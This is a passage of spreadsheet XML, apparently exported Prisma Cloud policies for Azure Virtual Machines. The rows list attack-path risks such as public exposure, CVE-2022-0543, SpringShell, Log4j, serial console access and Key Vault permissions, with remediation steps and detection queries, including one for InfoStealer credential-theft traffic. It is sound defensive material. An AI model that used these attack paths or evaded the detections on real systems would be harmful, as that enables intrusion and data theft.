          <t>This policy identifies Azure Virtual Machines that are publicly exposed, use basic authentication instead of SSH keys, and granted with risky permissions.
Publicly exposed Azure Virtual Machine with basic authentication enable bad actors to use brute force on a system to gain unauthorized access. The risky permissions on the instances could potentially lead to privilege escalation and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grant the least privileges and remove unwanted risky permissions assigned to the Virtual Machine, ensure Azure Virtual Machine uses SSH Key authentication instead of basic authentication, and restrict public exposure reported for the virtual machines as soon as possible.</t>
        </is>
      </c>
      <c r="X2519"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19" t="inlineStr"/>
      <c r="Z2519" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)','Azure Virtual Machine (Linux) does not authenticate using SSH keys','Azure VM associated with entities that have risky permissions')</t>
        </is>
      </c>
      <c r="AA2519" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2519" t="inlineStr">
        <is>
          <t>2024-01-19 05:21:02</t>
        </is>
      </c>
      <c r="AC2519" t="inlineStr"/>
      <c r="AD2519" t="b">
        <v>1</v>
      </c>
      <c r="AE2519" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2519" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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19" t="inlineStr">
        <is>
          <t>310b8769-1b28-4cd0-a870-49f6289180e9</t>
        </is>
      </c>
      <c r="AI2519" t="inlineStr">
        <is>
          <t>2d95fd5c-386d-47bb-81a2-ca7499af8307</t>
        </is>
      </c>
      <c r="AJ2519" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2519" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2520">
      <c r="A2520" t="inlineStr"/>
      <c r="B2520" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2520" s="2" t="inlineStr"/>
      <c r="D2520" t="inlineStr"/>
      <c r="E2520" t="inlineStr"/>
      <c r="F2520" t="inlineStr"/>
      <c r="G2520" t="b">
        <v>1</v>
      </c>
      <c r="H25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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2520" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2520" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable Azure Virtual Machine (Redis Servers in Debian Linux, CVE-2022-0543)</t>
        </is>
      </c>
      <c r="L2520" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2520" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2520" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2520" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2520" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2520" t="inlineStr"/>
      <c r="R2520" t="inlineStr"/>
      <c r="S2520" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2520" t="b">
        <v>0</v>
      </c>
      <c r="U2520" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2520" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2520" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machine that are publicly exposed and have known exploitable Remote code execution vulnerability (CVE-2022-0543).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Redis Servers in Debian Linux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Redis Servers in Debian Linux (CVE-2022-0543) vulnerability and public exposure reported for the affected Azure Virtual Machine as soon as possible.</t>
        </is>
      </c>
      <c r="X252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CVE-2022-0543
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-0543</t>
        </is>
      </c>
      <c r="Y2520" t="inlineStr"/>
      <c r="Z2520" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-0543'))</t>
        </is>
      </c>
      <c r="AA2520" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2520" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:19</t>
        </is>
      </c>
      <c r="AC2520" t="inlineStr"/>
      <c r="AD2520" t="b">
        <v>1</v>
      </c>
      <c r="AE2520" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2520" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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0" t="inlineStr">
        <is>
          <t>aa2fdcb0-9d8d-42aa-ba44-0a7051b9a837</t>
        </is>
      </c>
      <c r="AI2520" t="inlineStr">
        <is>
          <t>a0865463-8e8e-412e-83ee-ccecddb7c10e</t>
        </is>
      </c>
      <c r="AJ2520" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2520" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2521">
      <c r="A2521" t="inlineStr"/>
      <c r="B2521" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2521" s="2" t="inlineStr"/>
      <c r="D2521" t="inlineStr"/>
      <c r="E2521" t="inlineStr"/>
      <c r="F2521" t="inlineStr"/>
      <c r="G2521" t="b">
        <v>1</v>
      </c>
      <c r="H25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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2521" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2521" t="inlineStr">
        <is>
          <t>Remote code execution (RCE) exploitation attempt on Azure Virtual Machine with known exploitable vulnerability [Spring Framework, CVE-2022-22963, CVE-2022-22965]</t>
        </is>
      </c>
      <c r="L2521" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2521" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2521" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2521" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2521" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2521" t="inlineStr"/>
      <c r="R2521" t="inlineStr"/>
      <c r="S2521" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2521" t="b">
        <v>0</v>
      </c>
      <c r="U2521" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2521" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2521" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on Azure Virtual Machines that are vulnerable to remote code execution (RCE) with exploits in the wild [Spring Framework, CVE-2022-22963, CVE-2022-22965]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable Azure Virtual Machine. The fact that the Azure Virtual Machine has a vulnerable version of Spring Framework software installed makes it an easy target for an attacker to exploit these vulnerabilities. 
Immediate attention is required to remediate the Spring Framework [CVE-2022-22963, CVE-2022-22965] vulnerabilities reported for the Azure Virtual Machine.</t>
        </is>
      </c>
      <c r="X252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521" t="inlineStr"/>
      <c r="Z2521" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2022-22963, CVE-2022-22965 - SpringShell) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2022-22963', 'CVE-2022-22965'))</t>
        </is>
      </c>
      <c r="AA2521" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2521" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:41</t>
        </is>
      </c>
      <c r="AC2521" t="inlineStr"/>
      <c r="AD2521" t="b">
        <v>1</v>
      </c>
      <c r="AE2521" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2521" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG25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1" t="inlineStr">
        <is>
          <t>f6325c20-cac8-4f50-bb2d-7ffd153c85cd</t>
        </is>
      </c>
      <c r="AI2521" t="inlineStr">
        <is>
          <t>b055c763-7b63-4bf7-96a0-64b87a707ae3</t>
        </is>
      </c>
      <c r="AJ2521" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2521" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2522">
      <c r="A2522" t="inlineStr"/>
      <c r="B2522" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2522" s="2" t="inlineStr"/>
      <c r="D2522" t="inlineStr"/>
      <c r="E2522" t="inlineStr"/>
      <c r="F2522" t="inlineStr"/>
      <c r="G2522" t="b">
        <v>1</v>
      </c>
      <c r="H25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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2522" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2522" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to publicly exposed and vulnerable Azure Virtual Machine [Kubernetes, CVE-2022-2385]</t>
        </is>
      </c>
      <c r="L2522" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2522" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2522" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2522" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2522" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2522" t="inlineStr"/>
      <c r="R2522" t="inlineStr"/>
      <c r="S2522" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2522" t="b">
        <v>0</v>
      </c>
      <c r="U2522" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2522" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2522" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are publicly exposed and have known exploitable privilege escalation vulnerability [CVE-2022-2385].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Kubernetes [CVE-2022-2385] vulnerability and public exposure reported for the cloud function as soon as possible.</t>
        </is>
      </c>
      <c r="X2522"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CVE-2022-2385
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-2385</t>
        </is>
      </c>
      <c r="Y2522" t="inlineStr"/>
      <c r="Z2522" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-2385'))</t>
        </is>
      </c>
      <c r="AA2522" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2522" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:24</t>
        </is>
      </c>
      <c r="AC2522" t="inlineStr"/>
      <c r="AD2522" t="b">
        <v>1</v>
      </c>
      <c r="AE2522" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2522" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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2" t="inlineStr">
        <is>
          <t>088d6091-a4cc-484e-b118-a43e388771f3</t>
        </is>
      </c>
      <c r="AI2522" t="inlineStr">
        <is>
          <t>dce9ac83-1671-4f4f-a73e-dbb5d86b0d20</t>
        </is>
      </c>
      <c r="AJ2522" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2522" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2523">
      <c r="A2523" t="inlineStr"/>
      <c r="B2523" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2523" s="2" t="inlineStr"/>
      <c r="D2523" t="inlineStr"/>
      <c r="E2523" t="inlineStr"/>
      <c r="F2523" t="inlineStr"/>
      <c r="G2523" t="b">
        <v>1</v>
      </c>
      <c r="H25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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2523" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2523" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to Azure Virtual machine with public serial console access</t>
        </is>
      </c>
      <c r="L2523" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M2523" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2523" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2523" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2523" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2523" t="inlineStr"/>
      <c r="R2523" t="inlineStr"/>
      <c r="S2523" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2523" t="b">
        <v>0</v>
      </c>
      <c r="U2523" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2523" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2523" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that have public serial console access and have permissions that could potentially lead to privilege escalation.
Public serial console access on Azure Virtual machine could allow malicious actors to remotely exploit and get initial access to the instance. The risky permissions on the instance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review risky privilege escalation permissions, disable/restrict serial console permissions, and restrict public exposure reported for the virtual machines as soon as possible.</t>
        </is>
      </c>
      <c r="X2523" t="inlineStr">
        <is>
          <t>[PUBLIC_ACCESS]
1. Log in to the Azure portal
2. Navigate to Virtual machines
3. Click on the reported Virtual machine
4. Under Help section, Click on 'Boot diagnostics'
5. Click on 'Settings'
6. Set Status to 'Disable'
7. Clcik on Apply to save your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23" t="inlineStr"/>
      <c r="Z2523" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual machine configured with public IP and serial console access','Azure VM associated with entities that have risky permissions')</t>
        </is>
      </c>
      <c r="AA2523" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2523" t="inlineStr">
        <is>
          <t>2023-11-10 07:02:49</t>
        </is>
      </c>
      <c r="AC2523" t="inlineStr"/>
      <c r="AD2523" t="b">
        <v>1</v>
      </c>
      <c r="AE2523" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2523" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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3" t="inlineStr">
        <is>
          <t>d72d0449-bed4-4e7c-9745-ec06c9e03577</t>
        </is>
      </c>
      <c r="AI2523" t="inlineStr">
        <is>
          <t>a07502ee-a021-416d-929e-2c1c982165a6</t>
        </is>
      </c>
      <c r="AJ2523" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2523" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2524">
      <c r="A2524" t="inlineStr"/>
      <c r="B2524" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2524" s="2" t="inlineStr"/>
      <c r="D2524" t="inlineStr"/>
      <c r="E2524" t="inlineStr"/>
      <c r="F2524" t="inlineStr"/>
      <c r="G2524" t="b">
        <v>1</v>
      </c>
      <c r="H25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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2524" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2524" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable Azure Virtual Machine (Apache APISIX, CVE-2022-24112)</t>
        </is>
      </c>
      <c r="L2524" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2524" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2524" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2524" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2524" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2524" t="inlineStr"/>
      <c r="R2524" t="inlineStr"/>
      <c r="S2524" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2524" t="b">
        <v>0</v>
      </c>
      <c r="U2524" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2524" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2524" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machine that are publicly exposed and have known exploitable Remote code execution vulnerability (CVE-2022-24112).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APISIX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APISIX (CVE-2022-24112) vulnerability and public exposure reported for the affected Azure Virtual Machine as soon as possible.</t>
        </is>
      </c>
      <c r="X252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CVE-2022-24112
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-24112</t>
        </is>
      </c>
      <c r="Y2524" t="inlineStr"/>
      <c r="Z2524" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-24112'))</t>
        </is>
      </c>
      <c r="AA2524" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2524" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:08</t>
        </is>
      </c>
      <c r="AC2524" t="inlineStr"/>
      <c r="AD2524" t="b">
        <v>1</v>
      </c>
      <c r="AE2524" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2524" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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4" t="inlineStr">
        <is>
          <t>9947d38a-9a7e-4499-9b73-2a02577d8c1f</t>
        </is>
      </c>
      <c r="AI2524" t="inlineStr">
        <is>
          <t>ee4f5551-0b19-4edd-8922-d5ad71e6dd65</t>
        </is>
      </c>
      <c r="AJ2524" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2524" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2525">
      <c r="A2525" t="inlineStr"/>
      <c r="B2525" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2525" s="2" t="inlineStr"/>
      <c r="D2525" t="inlineStr"/>
      <c r="E2525" t="inlineStr"/>
      <c r="F2525" t="inlineStr"/>
      <c r="G2525" t="b">
        <v>1</v>
      </c>
      <c r="H25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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2525" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2525" t="inlineStr">
        <is>
          <t>Unauthorized access risk due to publicly exposed admin ports on Azure Virtual Machine with Key Vault management access</t>
        </is>
      </c>
      <c r="L2525" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2525" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2525" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2525" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2525" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2525" t="inlineStr"/>
      <c r="R2525" t="inlineStr"/>
      <c r="S2525" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2525" t="b">
        <v>0</v>
      </c>
      <c r="U2525" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2525" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2525" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines which are publicly exposed with unrestricted access to admin ports (SSH / RDP) and have Key Vault management access.
Key Vault management access on publicly exposed Virtual Machines with unrestricted access to admin ports (SSH / RDP) may allow an attacker to gain access to the Virtual Machines and grant access to cloud resources with sensitive information.
Immediate attention is required to review unwanted risky key management permissions assigned to the VM instance. Restrict public exposure of admin ports reported for the Virtual Machines as soon as possible.</t>
        </is>
      </c>
      <c r="X252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25" t="inlineStr"/>
      <c r="Z2525" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0) on Admin ports','Azure VM instance associated managed identities with Key Vault management access (data access is not included)')</t>
        </is>
      </c>
      <c r="AA2525" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2525" t="inlineStr">
        <is>
          <t>2024-01-19 05:21:04</t>
        </is>
      </c>
      <c r="AC2525" t="inlineStr"/>
      <c r="AD2525" t="b">
        <v>1</v>
      </c>
      <c r="AE2525" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2525" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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5" t="inlineStr">
        <is>
          <t>fe70e36e-5cce-46e2-b8f5-6fead1c7ad18</t>
        </is>
      </c>
      <c r="AI2525" t="inlineStr">
        <is>
          <t>28dff33b-ab3f-4757-b40e-46e7fadac29f</t>
        </is>
      </c>
      <c r="AJ2525" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2525" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2526">
      <c r="A2526" t="inlineStr"/>
      <c r="B2526" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2526" s="2" t="inlineStr"/>
      <c r="D2526" t="inlineStr"/>
      <c r="E2526" t="inlineStr"/>
      <c r="F2526" t="inlineStr"/>
      <c r="G2526" t="b">
        <v>1</v>
      </c>
      <c r="H25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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2526" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2526" t="inlineStr">
        <is>
          <t>Sensitive data leakage via 'InfoStealer' malware activity detected on a publicly exposed and vulnerable Azure Virtual Machine</t>
        </is>
      </c>
      <c r="L2526" t="inlineStr">
        <is>
          <t>MALWARE,INTERNET_EXPOSURE,INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M2526" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2526" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2526" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2526" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q2526" t="inlineStr"/>
      <c r="R2526" t="inlineStr"/>
      <c r="S2526" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2526" t="b">
        <v>0</v>
      </c>
      <c r="U2526" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2526" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2526" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines which are publicly exposed, have critical or high vulnerabilities and are connected with remote systems known for InfoStealer activities.
Infostealers are malicious software programs that gather confidential information from the compromised machine to send it to a predetermined location. This can include information related to the compromised machine, financial data, or user credentials for various web sites. Publicly exposed and exploitable virtual machines with network connectivity to remote systems known for infostealer activity indicate that the instance may already be under attack or has been compromised.
Immediate attention is required to investigate the infostealer activity, remediate critical and high vulnerabilities, and restrict public exposure reported for the virtual machines as soon as possible.</t>
        </is>
      </c>
      <c r="X252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26" t="inlineStr"/>
      <c r="Z2526" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name = (('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') and ('Traffic to a suspicious IP address associated with InfoStealer activity' or 'Traffic from a suspicious IP address associated with InfoStealer activity')) AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2526" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2526" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC2526" t="inlineStr"/>
      <c r="AD2526" t="b">
        <v>1</v>
      </c>
      <c r="AE2526" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2526" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG25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6" t="inlineStr">
        <is>
          <t>e7bff091-fa19-4531-a74f-239695a9d0aa</t>
        </is>
      </c>
      <c r="AI2526" t="inlineStr">
        <is>
          <t>9e07e7ee-b942-4855-9b39-711710f40937</t>
        </is>
      </c>
      <c r="AJ2526" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2526" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2527">
      <c r="A2527" t="inlineStr"/>
      <c r="B2527" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2527" s="2" t="inlineStr"/>
      <c r="D2527" t="inlineStr"/>
      <c r="E2527" t="inlineStr"/>
      <c r="F2527" t="inlineStr"/>
      <c r="G2527" t="b">
        <v>1</v>
      </c>
      <c r="H25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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2527" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2527" t="inlineStr">
        <is>
          <t>Remote code execution (RCE) exploitation attempt on Azure Virtual Machine with known exploitable vulnerability [Log4j, CVE-2021-45046]</t>
        </is>
      </c>
      <c r="L2527" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2527" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2527" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2527" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2527" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2527" t="inlineStr"/>
      <c r="R2527" t="inlineStr"/>
      <c r="S2527" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2527" t="b">
        <v>0</v>
      </c>
      <c r="U2527" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2527" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2527" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on Azure Virtual Machines that are vulnerable to remote code execution (RCE) with exploits in the wild [Log4j, CVE-2021-45046]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable Azure Virtual Machine. The fact that the Azure Virtual Machine has a vulnerable version of Log4j software installed makes it an easy target for an attacker to exploit this vulnerability. 
Immediate attention is required to remediate the Log4j [CVE-2021-45046] vulnerability reported for the Azure Virtual Machine.</t>
        </is>
      </c>
      <c r="X252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CVE-2021-45046
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2021-45046</t>
        </is>
      </c>
      <c r="Y2527" t="inlineStr"/>
      <c r="Z2527" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2021-45046 - Apache Log4j2 &lt; 2.16.0) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2021-45046'))</t>
        </is>
      </c>
      <c r="AA2527" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2527" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:40</t>
        </is>
      </c>
      <c r="AC2527" t="inlineStr"/>
      <c r="AD2527" t="b">
        <v>1</v>
      </c>
      <c r="AE2527" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2527" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG25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7" t="inlineStr">
        <is>
          <t>95d76c4e-7222-47cc-a5fa-9c532d6a867e</t>
        </is>
      </c>
      <c r="AI2527" t="inlineStr">
        <is>
